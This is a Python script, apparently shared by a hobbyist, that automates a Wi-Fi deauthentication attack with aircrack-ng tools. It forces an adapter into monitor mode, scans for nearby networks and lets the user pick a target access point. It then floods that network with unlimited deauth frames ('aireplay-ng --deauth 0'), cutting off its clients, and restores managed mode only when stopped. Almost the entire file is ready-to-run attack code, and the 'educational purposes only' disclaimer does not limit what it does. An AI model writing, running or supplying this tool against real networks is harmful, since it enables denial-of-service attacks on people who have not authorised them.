#!/usr/bin/env python3
# Created by SHADOW269
# Disclaimer: Educational purposes only.

import subprocess
import re
import csv
import os
import time
import shutil
from datetime import datetime

active_wireless_networks = []

def check_for_essid(essid, lst):
    check_status = True
    if len(lst) == 0:
        return check_status
    for item in lst:
        if essid in item["ESSID"]:
            check_status = False
    return check_status

# --- UI HEADER ---
print(r"""
     _               _                 ____   __   ___  
 ___| |__   __ _  __| | _____      __ |___ \ / /_ / _ \ 
/ __| '_ \ / _` |/ _` |/ _ \ \ /\ / /   __) | '_ \ (_) |
\__ \ | | | (_| | (_| | (_) \ V  V /   / __/| (_) \__, |
|___/_| |_|\__,_|\__,_|\___/ \_/\_/   |_____|\___/  /_/ 
""")
print("\n****************************************************************")
print("* Created by SHADOW269                                         *")
print("* https://portfolio.shadow269.in/                              *")
print("* https://github.com/SHADOW269                                 *")
print("****************************************************************")

# 1. Root Check
if not 'SUDO_UID' in os.environ.keys():
    print("\n[!] Error: Run with sudo (e.g., sudo python3 script.py)")
    exit()

# Check if aircrack-ng is installed
def check_dependencies():
    tools = ["airodump-ng", "airmon-ng", "aireplay-ng"]
    for tool in tools:
        if shutil.which(tool) is None:
            print(f"[!] Error: {tool} is not installed. Run 'sudo apt install aircrack-ng'")
            exit()

check_dependencies()

# 2. Cleanup Old CSVs
for file_name in os.listdir():
    if ".csv" in file_name:
        directory = os.getcwd()
        backup_dir = os.path.join(directory, "backup")
        if not os.path.exists(backup_dir):
            os.mkdir(backup_dir)
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        shutil.move(file_name, os.path.join(backup_dir, f"{timestamp}-{file_name}"))

# 3. Interface Discovery (Improved Regex for wlp5s0)
wlan_pattern = re.compile(r"^[w][a-z0-9]+")
cmd_output = subprocess.run(["iwconfig"], capture_output=True).stdout.decode()
check_wifi_result = wlan_pattern.findall(cmd_output)

if not check_wifi_result:
    print("[!] No WiFi adapter detected.")
    exit()

print("\nAvailable interfaces:")
for index, item in enumerate(check_wifi_result):
    print(f"{index} - {item}")

choice = input("\nSelect interface index: ")
hacknic = check_wifi_result[int(choice)]

# 4. FORCE MONITOR MODE (The "Motherboard Fix")
print(f"\n[+] Forcing {hacknic} into Monitor Mode...")
subprocess.run(["sudo", "airmon-ng", "check", "kill"])
subprocess.run(["sudo", "ip", "link", "set", hacknic, "down"])
subprocess.run(["sudo", "iw", hacknic, "set", "monitor", "none"])
subprocess.run(["sudo", "ip", "link", "set", hacknic, "up"])

# Verify if name changed (some drivers add 'mon')
time.sleep(1)
new_check = subprocess.run(["iwconfig"], capture_output=True).stdout.decode()
if hacknic + "mon" in new_check:
    hacknic_mon = hacknic + "mon"
else:
    hacknic_mon = hacknic

# 5. Background Scanning
print(f"[+] Scanning on {hacknic_mon}. Press Ctrl+C to stop.")
discover_process = subprocess.Popen(
    ["sudo", "airodump-ng", "-w", "scanfile", "--write-interval", "1", "--output-format", "csv", hacknic_mon],
    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)

try:
    while True:
        subprocess.call("clear", shell=True)
        # Look for the current CSV generated by airodump
        for file_name in os.listdir():
            if file_name.startswith("scanfile") and file_name.endswith(".csv"):
                with open(file_name) as csv_h:
                    csv_h.seek(0)
                    fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
                    csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
                    for row in csv_reader:
                        if row["BSSID"] == "BSSID" or row["BSSID"] == "Station MAC" or not row["ESSID"]:
                            continue
                        if check_for_essid(row["ESSID"], active_wireless_networks):
                            active_wireless_networks.append(row)

        print(f"Interface: {hacknic_mon} | Mode: MONITOR\n")
        print(f"{'No':<4} | {'BSSID':<20} | {'CH':<4} | {'ESSID'}")
        print("-" * 60)
        for index, item in enumerate(active_wireless_networks):
            print(f"{index:<4} | {item['BSSID']:<20} | {item['channel'].strip():<4} | {item['ESSID']}")
        time.sleep(1)

except KeyboardInterrupt:
    discover_process.terminate()
    print("\n\n[+] Scan Stopped.")

# 6. Target Selection
if not active_wireless_networks:
    print("[!] No networks found. Restarting NetworkManager...")
    subprocess.run(["sudo", "systemctl", "start", "NetworkManager"])
    exit()

target_idx = input("\nSelect target number to deauth: ")
target_bssid = active_wireless_networks[int(target_idx)]["BSSID"]
target_channel = active_wireless_networks[int(target_idx)]["channel"].strip()

# 7. Attack
print(f"[+] Locking {hacknic_mon} to Channel {target_channel}...")
subprocess.run(["sudo", "iwconfig", hacknic_mon, "channel", target_channel])

print(f"[+] Attacking {target_bssid}. Press Ctrl+C to stop.")
try:
    subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", target_bssid, hacknic_mon])
except KeyboardInterrupt:
    print("\n[+] Stopping attack and restoring Managed Mode...")
    subprocess.run(["sudo", "ip", "link", "set", hacknic_mon, "down"])
    subprocess.run(["sudo", "iw", hacknic_mon, "set", "type", "managed"])
    subprocess.run(["sudo", "ip", "link", "set", hacknic_mon, "up"])
    subprocess.run(["sudo", "systemctl", "start", "NetworkManager"])
    print("[+] Done. Internet should return shortly.")